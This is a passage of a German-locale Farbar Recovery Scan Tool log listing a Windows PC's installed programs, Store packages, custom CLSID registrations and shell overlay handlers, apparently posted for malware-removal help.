Combo Cleaner (HKLM-x32\...\InstallShield_{8C9F8853-52F7-46F3-BC78-98001D3FF40C}) (Version: 1.0.63.0 - RCS LT)
CrystalDiskInfo 9.2.3 (HKLM\...\CrystalDiskInfo_is1) (Version: 9.2.3 - Crystal Dew World)
CurseForge (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Overwolf_cchhcaiapeikjbdbpfplgmpobbcdkdaphclbmkbj) (Version: 1.256.3.1 - Overwolf app)
Discord (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Discord) (Version: 1.0.9023 - Discord Inc.)
Easy Connection to Screen (HKLM\...\{B779166F-820A-44EE-9DAC-7F794BC8A67F}) (Version: 4.7.1 - Samsung)
ENE Video Capture Box HAL (HKLM\...\{A096611D-BA11-4A1A-8D09-0A0462D7C8F2}) (Version: 1.0.5.15 - Ene Tech.) Hidden
ENE Video Capture Box HAL (HKLM-x32\...\{974259bf-3ed1-4cd6-9ed1-40c7f601a786}) (Version: 1.0.5.15 - Ene Tech.) Hidden
ENE_DRAM_RGB_AIO (HKLM\...\{40514BA6-1FC2-4BBD-84A2-504634A97196}) (Version: 1.0.4.16 - Ene Tech.) Hidden
ENE_DRAM_RGB_AIO (HKLM-x32\...\{ca38f41e-a37c-41b2-82e3-28b215743448}) (Version: 1.0.4.16 - Ene Tech.) Hidden
ENE_EHD_M2_HAL (HKLM\...\{37A48B7F-D4EA-4863-844E-A284E2AA3C5D}) (Version: 1.0.11.2 - ENE TECHNOLOGY INC.) Hidden
ENE_EHD_M2_HAL (HKLM-x32\...\{7cf61546-b8ec-4a85-a301-fa8c79296bd0}) (Version: 1.0.11.2 - ENE TECHNOLOGY INC.) Hidden
ENE_External_Device_HAL (HKLM\...\{2B8E611F-0B51-4FAC-87BB-AF50D82E7DDA}) (Version: 1.0.11.1 - ENE Tech) Hidden
ENE_External_Device_HAL (HKLM-x32\...\{bb9d349f-b87b-4026-b336-1604708bd09c}) (Version: 1.0.11.1 - ENE Tech) Hidden
ENE_MousePad_HAL (HKLM\...\{9E97178A-ADB8-4778-BE60-7E28E2A72721}) (Version: 1.0.2.0 - ENE TECHNOLOGY INC.) Hidden
ENE_MousePad_HAL (HKLM-x32\...\{c2c794a4-7986-4c45-884d-d4ca43b88df9}) (Version: 1.0.2.0 - ENE TECHNOLOGY INC.) Hidden
ENE_X_AIC_HAL (HKLM\...\{CF703694-01C6-4062-B797-84DB215662BC}) (Version: 1.0.6.3 - ENE TECHNOLOGY INC.) Hidden
ENE_X_AIC_HAL (HKLM-x32\...\{c662a481-d76a-4188-95d2-6eb4ffd55542}) (Version: 1.0.6.3 - ENE TECHNOLOGY INC.) Hidden
Epic Games Launcher (HKLM-x32\...\{5F15891E-8342-47CD-AFFF-89211CFC04D0}) (Version: 1.3.23.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Epic Online Services (HKLM-x32\...\{758842D2-1538-4008-A8E3-66F65A061C52}) (Version: 2.0.33.0 - Epic Games, Inc.)
Futuremark SystemInfo (HKLM-x32\...\{DB3FC272-D04E-42E1-A981-20A781A9561C}) (Version: 5.69.1204.0 - Futuremark)
GIMP 2.10.34-2 (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\GIMP-2_is1) (Version: 2.10.34 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 127.0.6533.72 - Google LLC)
iPod-Unterstützung (HKLM\...\{5530CCC4-99F6-4198-BB1B-F1F78D6BCA76}) (Version: 12.11.3.7 - Apple Inc.)
Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
LIFT 3.0 (HKLM\...\{535DCAB0-B2C4-45F1-B03D-7E7A1059B74E}) (Version: 3.2.0 - C.C.Buchner)
Malwarebytes version 5.1.6.117 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 5.1.6.117 - Malwarebytes)
Microsoft 365 - de-de (HKLM\...\O365HomePremRetail - de-de) (Version: 16.0.15225.20204 - Microsoft Corporation)
Microsoft 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 16.0.15225.20204 - Microsoft Corporation)
Microsoft 365 - es-es (HKLM\...\O365HomePremRetail - es-es) (Version: 16.0.15225.20204 - Microsoft Corporation)
Microsoft 365 - fr-fr (HKLM\...\O365HomePremRetail - fr-fr) (Version: 16.0.15225.20204 - Microsoft Corporation)
Microsoft 365 - it-it (HKLM\...\O365HomePremRetail - it-it) (Version: 16.0.15225.20204 - Microsoft Corporation)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 126.0.2592.113 - Microsoft Corporation)
Microsoft Edge WebView2-Laufzeit (HKLM-x32\...\Microsoft EdgeWebView) (Version: 126.0.2592.113 - Microsoft Corporation)
Microsoft GameInput (HKLM-x32\...\{1F2B6AF3-C260-8666-5950-E3FEDBC851D6}) (Version: 10.1.22621.3036 - Microsoft Corporation)
Microsoft OneDrive (HKLM\...\OneDriveSetup.exe) (Version: 24.132.0701.0002 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{C6FD611E-7EFE-488C-A0E0-974C09EF6473}) (Version: 5.72.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (HKLM\...\{37B8F9C7-03FB-3253-8781-2517C99D7C00}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (HKLM\...\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 (HKLM-x32\...\{B175520C-86A2-35A7-8619-86DC379688B9}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 (HKLM-x32\...\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (HKLM-x32\...\{8bdfe669-9705-4184-9368-db9ce581e0e7}) (Version: 14.36.32532.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (HKLM-x32\...\{410c0ee1-00bb-41b6-9772-e12c2828b02f}) (Version: 14.36.32532.0 - Microsoft Corporation)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (HKLM\...\{0025DD72-A959-45B5-A0A3-7EFEB15A8050}) (Version: 14.36.32532 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (HKLM\...\{D5D19E2F-7189-42FE-8103-92CD1FA457C2}) (Version: 14.36.32532 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (HKLM-x32\...\{C2C59CAB-8766-4ABD-A8EF-1151A36C41E5}) (Version: 14.36.32532 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (HKLM-x32\...\{73F77E4E-5A17-46E5-A5FC-8A061047725F}) (Version: 14.36.32532 - Microsoft Corporation) Hidden
Microsoft Visual Studio Code (User) (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\{771FD6B0-FA20-440A-A002-3B3BAC16DC50}_is1) (Version: 1.90.2 - Microsoft Corporation)
Mine-imator 1.2.9 (HKLM-x32\...\{EF61A1AA-5F85-4E94-ACC6-D5650A312AE6}}_is1) (Version: 1.2.9.2 - David Norgren)
MSI Afterburner 4.6.5 (HKLM-x32\...\Afterburner) (Version: 4.6.5 - MSI Co., LTD)
MSI Center SDK (HKLM-x32\...\{15289038-41BE-48F8-B8B9-0B1021D3089E}}_is1) (Version: 3.2023.1127.01 - MSI)
MSIRegister (HKLM-x32\...\{80B995A4-3A86-4690-98A6-563F1A788835}_is1) (Version: 2.0.0.22 - MSI)
Norton 360 (HKLM-x32\...\NGC) (Version: 22.24.2.6 - NortonLifeLock Inc)
NVIDIA FrameView SDK 1.3.8513.32290073 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_FrameViewSdk) (Version: 1.3.8513.32290073 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.27.0.120 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.27.0.120 - NVIDIA Corporation)
NVIDIA Grafiktreiber 551.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 551.52 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.40.14 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.40.14 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.21.0713 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.21.0713 - NVIDIA Corporation)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 29.1.3 - OBS Project)
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.15225.20150 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.15128.20178 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.15225.20194 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0407-0000-0000000FF1CE}) (Version: 16.0.15128.20178 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-040C-0000-0000000FF1CE}) (Version: 16.0.15128.20178 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0410-0000-0000000FF1CE}) (Version: 16.0.15128.20178 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0C0A-0000-0000000FF1CE}) (Version: 16.0.15128.20178 - Microsoft Corporation) Hidden
Opera GX Stable 109.0.5097.142 (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Opera GX 109.0.5097.142) (Version: 109.0.5097.142 - Opera Software)
Overwolf (HKLM-x32\...\Overwolf) (Version: 0.256.0.2 - Overwolf Ltd.)
Patriot Viper M2 SSD RGB (HKLM\...\{8B4C0A3D-C135-4E1F-98D8-3926494B4D61}) (Version: 1.1.0.1 - Patriot Memory) Hidden
Patriot Viper M2 SSD RGB (HKLM-x32\...\{07236f40-ec25-4646-8cb6-b6aaf1597324}) (Version: 1.1.0.1 - Patriot Memory) Hidden
PowerToys (Preview) (HKLM\...\{92AE79ED-B1CD-425A-8111-64E61153C5E1}) (Version: 0.81.1 - Microsoft Corporation) Hidden
PowerToys (Preview) x64 (HKLM-x32\...\{fca38025-53e3-439e-8a24-a3261efd2924}) (Version: 0.81.1 - Microsoft Corporation)
Promontory_GPIO Driver (HKLM-x32\...\{B5512BCC-F4CD-4159-86A4-B2AD7D38FFA9}) (Version: 2.0.1.0 - Advanced Micro Devices, Inc.) Hidden
Realtek Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.9071.1 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.42.526.2020 - Realtek)
Revo Uninstaller 2.4.5 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.4.5 - VS Revo Group, Ltd.)
RGB Fusion (HKLM-x32\...\{FFA8F1FA-3C2C-4A94-AC0B-0DF47272C25F}) (Version: 3.22.1221.1 - Gigabyte)
Shotcut (HKLM\...\Shotcut_is1) (Version: 23.09.29 - Meltytech)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
UltiMaker Cura 5.4.0 (HKLM-x32\...\UltiMaker Cura 5.4.0-5.4.0) (Version: 5.4.0 - UltiMaker)
UltiMaker Cura 5.5.0 (HKLM-x32\...\UltiMaker Cura 5.5.0-5.5.0) (Version: 5.5.0 - UltiMaker)
Uninstall Lunar Client (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\1fcec38f-e773-5444-8669-32b8eb41524b) (Version: 3.2.11 - Moonsworth LLC)
Verbatim_SureFireGaming_Product (HKLM\...\{35CB65C6-A7E3-4EE7-AD40-738D70A72164}) (Version: 1.0.3.11 - Verbatim) Hidden
Verbatim_SureFireGaming_Product (HKLM-x32\...\{d601832a-0d94-46ce-9b19-78e8a5887313}) (Version: 1.0.3.11 - Verbatim) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 3.0.20 - VideoLAN)
WD P40 Game Drive (HKLM\...\{EE55DBAE-ECDD-4ADD-AAB5-23DE848B0996}) (Version: 1.0.2.18 - Western Digital Corporation) Hidden
WD P40 Game Drive (HKLM-x32\...\{72b1a866-fc31-4381-bff3-fa6cd8823777}) (Version: 1.0.2.18 - Western Digital Corporation) Hidden
WD_BLACK AN1500 (HKLM\...\{085E2365-0A70-4230-B664-02D5E4FE7E9C}) (Version: 1.0.12.0 - ENE TECHNOLOGY INC.) Hidden
WD_BLACK AN1500 (HKLM-x32\...\{9c94735f-73fd-4b0f-9ddb-8be7b3cc4681}) (Version: 1.0.12.0 - ENE TECHNOLOGY INC.) Hidden
WD_BLACK D50 (HKLM\...\{BDE43F26-5917-44F8-B86A-F1D9A6B80B32}) (Version: 1.0.9.0 - ENE TECHNOLOGY INC.) Hidden
WD_BLACK D50 (HKLM-x32\...\{a1d1ba00-92b7-4a99-8ebd-65b25c0e9e44}) (Version: 1.0.9.0 - ENE TECHNOLOGY INC.) Hidden
Windows-Treiberpaket - Apple, Inc. (USBAAPL) USB (05/19/2017 6.0.9999.69) (HKLM\...\7771A0176A543725D7BBF70A546C096A4EE2DD40) (Version: 05/19/2017 6.0.9999.69 - Apple, Inc.)
Windows-Treiberpaket - Apple, Inc. (USBAAPL64) USB (05/19/2017 6.0.9999.69) (HKLM\...\C2C6A29F3ABC80FD992777A92DF30699124D37C5) (Version: 05/19/2017 6.0.9999.69 - Apple, Inc.)
WinRAR 6.23 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 6.23.0 - win.rar GmbH)
Packages:
=========
Atomic Heart -> C:\Program Files\WindowsApps\FocusHomeInteractiveSA.579645D26CFD_1.14.4.0_x64__4hny5m903y3g0 [2024-06-15] (Focus Home Interactive SA)
Atomic Heart: Annihilation Instinct -> C:\Program Files\WindowsApps\FocusHomeInteractiveSA.1495F5E33141_1.0.0.0_x64__4hny5m903y3g0 [2023-10-13] (Focus Home Interactive SA)
Atomic Heart: Trapped in Limbo -> C:\Program Files\WindowsApps\FocusHomeInteractiveSA.48903E5CC1186_1.0.0.0_x64__4hny5m903y3g0 [2024-04-06] (Focus Home Interactive SA)
Copilot -> C:\Program Files\WindowsApps\Microsoft.Copilot_1.0.4.0_neutral__8wekyb3d8bbwe [2024-07-14] (Microsoft Corporation)
Disney+ -> C:\Program Files\WindowsApps\Disney.37853FC22B2CE_2024.3.211.0_neutral__6rarf9sa4v8jt [2024-07-14] (Disney)
EarTrumpet -> C:\Program Files\WindowsApps\40459File-New-Project.EarTrumpet_2.3.0.0_x86__1sdd7yawvg6ne [2024-07-14] (File-New-Project) [Startup Task]
Hello Neighbor 2 -> C:\Program Files\WindowsApps\tinyBuildGames.HelloNeighbor2_1.3.6.0_x64__3sz1pp2ynv2xe [2024-06-15] (tinyBuild Games)
High on Life -> C:\Program Files\WindowsApps\2637SquanchGamesInc.HighonLife_1.13.3652.0_x64__mh7dg3tfmz2cj [2024-06-15] (Squanch Games Inc.)
Instagram -> C:\Program Files\WindowsApps\Facebook.InstagramBeta_42.0.23.0_neutral__8xx8rvfyw5nnt [2024-07-14] (Instagram)
iTunes -> C:\Program Files\WindowsApps\AppleInc.iTunes_12132.3.2017.0_x64__nzyj5cx40ttqa [2024-05-22] (Apple Inc.) [Startup Task]
Microsoft Family -> C:\Program Files\WindowsApps\MicrosoftCorporationII.MicrosoftFamily_0.2.40.0_x64__8wekyb3d8bbwe [2023-11-09] (Microsoft Corp.)
Microsoft Whiteboard -> C:\Program Files\WindowsApps\Microsoft.Whiteboard_53.21110.548.0_x64__8wekyb3d8bbwe [2024-03-07] (Microsoft Corporation)
Microsoft.BingSearch -> C:\Program Files\WindowsApps\Microsoft.BingSearch_1.0.95.0_x64__8wekyb3d8bbwe [2024-07-23] (Microsoft Corporation)
MicrosoftWindows.CrossDevice -> C:\Program Files\WindowsApps\MicrosoftWindows.CrossDevice_1.24062.51.0_x64__cw5n1h2txyewy [2024-07-19] (Microsoft Windows) [Startup Task]
Minecraft for Windows -> C:\Program Files\WindowsApps\Microsoft.MinecraftUWP_1.21.202.0_x64__8wekyb3d8bbwe [2024-07-09] (Microsoft Studios)
Minecraft Launcher -> C:\Program Files\WindowsApps\Microsoft.4297127D64EC6_1.7.2.0_x64__8wekyb3d8bbwe [2024-06-15] (Microsoft Studios)
Minecraft Legends - Windows -> C:\Program Files\WindowsApps\Microsoft.BadgerWin10_1.18.19068.0_x64__8wekyb3d8bbwe [2024-06-15] (Microsoft Studios)
Minecraft: Java Edition -> C:\Program Files\WindowsApps\Microsoft.MinecraftJavaEdition_1.0.5.0_x64__8wekyb3d8bbwe [2024-06-15] (Microsoft Studios)
MSI Center -> C:\Program Files\WindowsApps\9426MICRO-STARINTERNATION.MSICenter_2.0.38.0_x64__kzh8wxbdkxb8p [2024-06-29] (MICRO-STAR INTERNATIONAL CO., LTD) [Startup Task]
MSI Game Bar -> C:\Program Files\WindowsApps\9426MICRO-STARINTERNATION.MSIGameBar_2.0.15.0_x64__kzh8wxbdkxb8p [2024-02-07] (MICRO-STAR INTERNATIONAL CO., LTD)
Netflix -> C:\Program Files\WindowsApps\4DF9E0F8.Netflix_7.0.8.0_neutral__mcm4njqhnhss8 [2024-07-23] (Netflix, Inc.)
Norton Security -> C:\Program Files\Norton Security\Engine\22.24.2.6 [2024-07-24] (NortonLifeLock Inc.)
NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.966.0_x64__56jybvy8sckqj [2024-04-24] (NVIDIA Corp.)
PowerToys FileLocksmith Context Menu -> C:\Program Files\PowerToys\WinUI3Apps [2024-06-09] (Microsoft)
PowerToys ImageResizer Context Menu -> C:\Program Files\PowerToys [2024-06-09] (Microsoft)
PowerToys PowerRename Context Menu -> C:\Program Files\PowerToys\WinUI3Apps [2024-06-09] (Microsoft)
Python 3.11 -> C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.11_3.11.2544.0_x64__qbz5n2kfra8p0 [2024-04-03] (Python Software Foundation)
Quizlet -> C:\Program Files\WindowsApps\QuizletInc.Quizlet_1.0.1.0_neutral__1kmnvb67sms8a [2024-07-14] (Quizlet, Inc.)
Roblox -> C:\Program Files\WindowsApps\ROBLOXCORPORATION.ROBLOX_2.634.417.0_x64__55nm5eh3cm0pr [2024-07-19] (Roblox Corporation)
Speech Pack - German (Germany) -> C:\Program Files\WindowsApps\MicrosoftWindows.Speech.de-DE.1_1.0.5.0_x64__cw5n1h2txyewy [2024-06-23] (Microsoft Windows)
Spotify Music -> C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.242.290.0_x64__zpdnekdrzrea0 [2024-07-19] (Spotify AB) [Startup Task]
Supraland: Six Inches Under -> C:\Program Files\WindowsApps\HumbleBundle.SupralandSixInchesUnder_1.0.29.0_x64__q2mcdwmzx4qja [2024-06-15] (Humble Bundle)
WhatsApp -> C:\Program Files\WindowsApps\5319275A.WhatsAppDesktop_2.2428.10.0_x64__cv1g1gvanyjgm [2024-07-24] (WhatsApp Inc.) [Startup Task]
WinAppRuntime.Main.1.5 -> C:\Program Files\WindowsApps\MicrosoftCorporationII.WinAppRuntime.Main.1.5_5001.178.1908.0_x64__8wekyb3d8bbwe [2024-07-10] (Microsoft Corp.)
WinAppRuntime.Singleton -> C:\Program Files\WindowsApps\MicrosoftCorporationII.WinAppRuntime.Singleton_5001.178.1908.0_x64__8wekyb3d8bbwe [2024-07-10] (Microsoft Corp.)
Windows Feature Experience Pack -> C:\Windows\SystemApps\MicrosoftWindows.Client.LKG_cw5n1h2txyewy [2024-07-12] (Microsoft Windows)
Windows-Fotoanzeige -> C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2024.11070.19012.0_x64__8wekyb3d8bbwe [2024-07-23] (Microsoft Corporation) [Startup Task]
WinRAR -> C:\Program Files\WinRAR [2023-09-13] (win.rar GmbH)
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{10144713-1526-46C9-88DA-1FB52807A9FF}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.SvgThumbnailProviderCpp.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{5ea9a442-5352-ed6e-d37f-9d511e7e2caa}\localserver32 -> C:\Program Files\PowerToys\PowerToys.PowerLauncher.exe (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{60789D87-9C3C-44AF-B18C-3DE2C2820ED3}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.MarkdownPreviewHandlerCpp.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{729B72CD-B72E-4FE9-BCBF-E954B33FE699}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.QoiPreviewHandlerCpp.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{77257004-6F25-4521-B602-50ECC6EC62A6}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.StlThumbnailProviderCpp.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{A0257634-8812-4CE8-AF11-FA69ACAEAFAE}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.GcodePreviewHandlerCpp.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{AD856B15-D25E-4008-AFB7-AFAA55586188}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.QoiThumbnailProviderCpp.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{C4F0910E-E0B4-4E68-8086-452730C7A26A}\InprocServer32 -> C:\Users\skysc\AppData\Local\Autodesk\webdeploy\production\dabca83aceed67f5b8555a5b9697a3fc08792c77\NPreview10.dll (Autodesk, Inc. -> )
CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{D8034CFA-F34B-41FE-AD45-62FCBB52A6DA}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.MonacoPreviewHandlerCpp.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{F2847CBE-CD03-4C83-A359-1A8052C1B9D5}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.GcodeThumbnailProviderCpp.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{FCDD4EED-41AA-492F-8A84-31A1546226E0}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.SvgPreviewHandlerCpp.dll (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [ OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
ShellIconOverlayIdentifiers: [ OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
ShellIconOverlayIdentifiers: [ OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
